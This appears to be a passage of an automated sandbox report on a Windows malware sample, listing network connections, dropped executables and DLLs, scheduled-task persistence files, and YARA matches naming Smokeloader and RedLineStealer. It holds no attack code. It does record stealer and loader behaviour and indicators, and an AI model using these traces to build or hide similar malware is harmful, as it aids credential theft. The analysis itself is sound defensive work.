Source: firefox.exe, 00000028.00000002.2931107138.0000026194CA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comZ
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comdocument-element-inserted
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.comdocument-element-insertedwebIsolated=https://youtube.comdocument-element-inserted

Source: unknown	Network traffic detected: HTTP traffic on port 61247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61190
Source: unknown	Network traffic detected: HTTP traffic on port 61459 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61193
Source: unknown	Network traffic detected: HTTP traffic on port 61488 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61451 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61348
Source: unknown	Network traffic detected: HTTP traffic on port 61391 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61349
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61460
Source: unknown	Network traffic detected: HTTP traffic on port 61218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61463
Source: unknown	Network traffic detected: HTTP traffic on port 61256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61223
Source: unknown	Network traffic detected: HTTP traffic on port 61271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55876
Source: unknown	Network traffic detected: HTTP traffic on port 61242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55993
Source: unknown	Network traffic detected: HTTP traffic on port 61416 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55875
Source: unknown	Network traffic detected: HTTP traffic on port 61402 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56210
Source: unknown	Network traffic detected: HTTP traffic on port 61236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61448 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61230
Source: unknown	Network traffic detected: HTTP traffic on port 55791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61199
Source: unknown	Network traffic detected: HTTP traffic on port 61253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61357
Source: unknown	Network traffic detected: HTTP traffic on port 61249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61524 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61402
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61249
Source: unknown	Network traffic detected: HTTP traffic on port 61258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61524
Source: unknown	Network traffic detected: HTTP traffic on port 56346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61488
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61401
Source: unknown	Network traffic detected: HTTP traffic on port 61244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61259
Source: unknown	Network traffic detected: HTTP traffic on port 61343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61416
Source: unknown	Network traffic detected: HTTP traffic on port 61230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61391
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61271
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61392
Source: unknown	Network traffic detected: HTTP traffic on port 61432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55791
Source: unknown	Network traffic detected: HTTP traffic on port 61449 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55792
Source: unknown	Network traffic detected: HTTP traffic on port 55792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61283
Source: unknown	Network traffic detected: HTTP traffic on port 55993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61366 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61319
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61274
Source: unknown	Network traffic detected: HTTP traffic on port 61349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61430
Source: unknown	Network traffic detected: HTTP traffic on port 61257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61311
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61432
Source: unknown	Network traffic detected: HTTP traffic on port 61295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61463 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61293
Source: unknown	Network traffic detected: HTTP traffic on port 61325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61430 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61325
Source: unknown	Network traffic detected: HTTP traffic on port 61401 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61448
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61449
Source: unknown	Network traffic detected: HTTP traffic on port 61212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61323
Source: unknown	Network traffic detected: HTTP traffic on port 61223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61337
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61459
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61295
Source: unknown	Network traffic detected: HTTP traffic on port 61217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61330
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61451
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61331
Source: unknown	Network traffic detected: HTTP traffic on port 61293 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61299
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61212

Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61302 version: TLS 1.2

Drops certificate files (DER)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp7452.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp73F3.tmp			Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2419937353.0000000002600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2420085269.00000000026BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.2778148129.00000000027BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.2769315427.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002E.00000002.2853503959.00000000026A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

PE file contains section with special chars

Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: .idata
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name: .idata
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: .idata
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: .idata
Source: axplong.exe.5.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name: .idata
Source: explorti.exe.8.dr	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C73B700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C73B8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C73B910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6DF280

Creates files inside the system directory

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File created: C:\Windows\Tasks\explorti.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\TrainsSexcam
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\GamingNat
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\PermitLite
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\JennyArtistic
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\PolyphonicWeblog
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\SgLaid
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\FacingLone
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\GeniusRepeat
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\EditedRights
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\XiMilton
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	File created: C:\Windows\MissWheat

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D35A0	0_2_6C6D35A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74545C	0_2_6C74545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E5440	0_2_6C6E5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74542B	0_2_6C74542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C715C10	0_2_6C715C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C722C10	0_2_6C722C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74AC00	0_2_6C74AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C716CF0	0_2_6C716CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DD4E0	0_2_6C6DD4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E64C0	0_2_6C6E64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FD4D0	0_2_6C6FD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7334A0	0_2_6C7334A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73C4A0	0_2_6C73C4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E6C80	0_2_6C6E6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C700512	0_2_6C700512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EFD00	0_2_6C6EFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FED10	0_2_6C6FED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7385F0	0_2_6C7385F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C710DD0	0_2_6C710DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C746E63	0_2_6C746E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DC670	0_2_6C6DC670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C713E50	0_2_6C713E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F4640	0_2_6C6F4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C722E4E	0_2_6C722E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F9E50	0_2_6C6F9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C739E30	0_2_6C739E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C717E10	0_2_6C717E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C725600	0_2_6C725600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7476E3	0_2_6C7476E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DBEF0	0_2_6C6DBEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EFEF0	0_2_6C6EFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C734EA0	0_2_6C734EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73E680	0_2_6C73E680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F5E90	0_2_6C6F5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C717710	0_2_6C717710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E9F00	0_2_6C6E9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C706FF0	0_2_6C706FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DDFE0	0_2_6C6DDFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7277A0	0_2_6C7277A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71F070	0_2_6C71F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F8850	0_2_6C6F8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FD850	0_2_6C6FD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71B820	0_2_6C71B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C724820	0_2_6C724820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E7810	0_2_6C6E7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FC0E0	0_2_6C6FC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7158E0	0_2_6C7158E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7450C7	0_2_6C7450C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7060A0	0_2_6C7060A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72B970	0_2_6C72B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74B170	0_2_6C74B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6ED960	0_2_6C6ED960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FA940	0_2_6C6FA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70D9B0	0_2_6C70D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DC9A0	0_2_6C6DC9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C715190	0_2_6C715190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C732990	0_2_6C732990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C719A60	0_2_6C719A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71E2F0	0_2_6C71E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F1AF0	0_2_6C6F1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C718AC0	0_2_6C718AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C742AB0	0_2_6C742AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D22A0	0_2_6C6D22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C704AA0	0_2_6C704AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6ECAB0	0_2_6C6ECAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74BA90	0_2_6C74BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EC370	0_2_6C6EC370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D5340	0_2_6C6D5340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71D320	0_2_6C71D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7453C8	0_2_6C7453C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DF380	0_2_6C6DF380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78AC60	0_2_6C78AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C846C00	0_2_6C846C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7DECD0	0_2_6C7DECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85AC30	0_2_6C85AC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77ECC0	0_2_6C77ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C816D90	0_2_6C816D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C90CDC0	0_2_6C90CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C908D20	0_2_6C908D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C784DB0	0_2_6C784DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8AAD50	0_2_6C8AAD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84ED70	0_2_6C84ED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C806E90	0_2_6C806E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C820EC0	0_2_6C820EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C860E20	0_2_6C860E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78AEC0	0_2_6C78AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81EE70	0_2_6C81EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C8FB0	0_2_6C8C8FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7EEF40	0_2_6C7EEF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C786F10	0_2_6C786F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C85EFF0	0_2_6C85EFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C780FE0	0_2_6C780FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8C0F20	0_2_6C8C0F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78EFB0	0_2_6C78EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C842F70	0_2_6C842F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D0820	0_2_6C7D0820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8868E0	0_2_6C8868E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80A820	0_2_6C80A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C854840	0_2_6C854840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B8960	0_2_6C7B8960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8109A0	0_2_6C8109A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C83A9A0	0_2_6C83A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8409B0	0_2_6C8409B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C89C9E0	0_2_6C89C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D6900	0_2_6C7D6900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B49F0	0_2_6C7B49F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FCA70	0_2_6C7FCA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82EA00	0_2_6C82EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C838A30	0_2_6C838A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FEA80	0_2_6C7FEA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C820BA0	0_2_6C820BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C886BE0	0_2_6C886BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8AA480	0_2_6C8AA480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C798460	0_2_6C798460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81A4D0	0_2_6C81A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E4420	0_2_6C7E4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C64D0	0_2_6C7C64D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80A430	0_2_6C80A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7E2560	0_2_6C7E2560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D8540	0_2_6C7D8540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C84A5E0	0_2_6C84A5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80E5F0	0_2_6C80E5F0

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C9009D0 appears 137 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C7A3620 appears 35 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C90DAE0 appears 33 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C7194D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C70CBE8 appears 134 times

One or more processes crash

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 2504

PE file contains more sections than normal

Source: build2[1].exe.20.dr	Static PE information: Number of sections : 11 > 10
Source: build2.exe.20.dr	Static PE information: Number of sections : 11 > 10

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000000.2003380792.000000000244C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
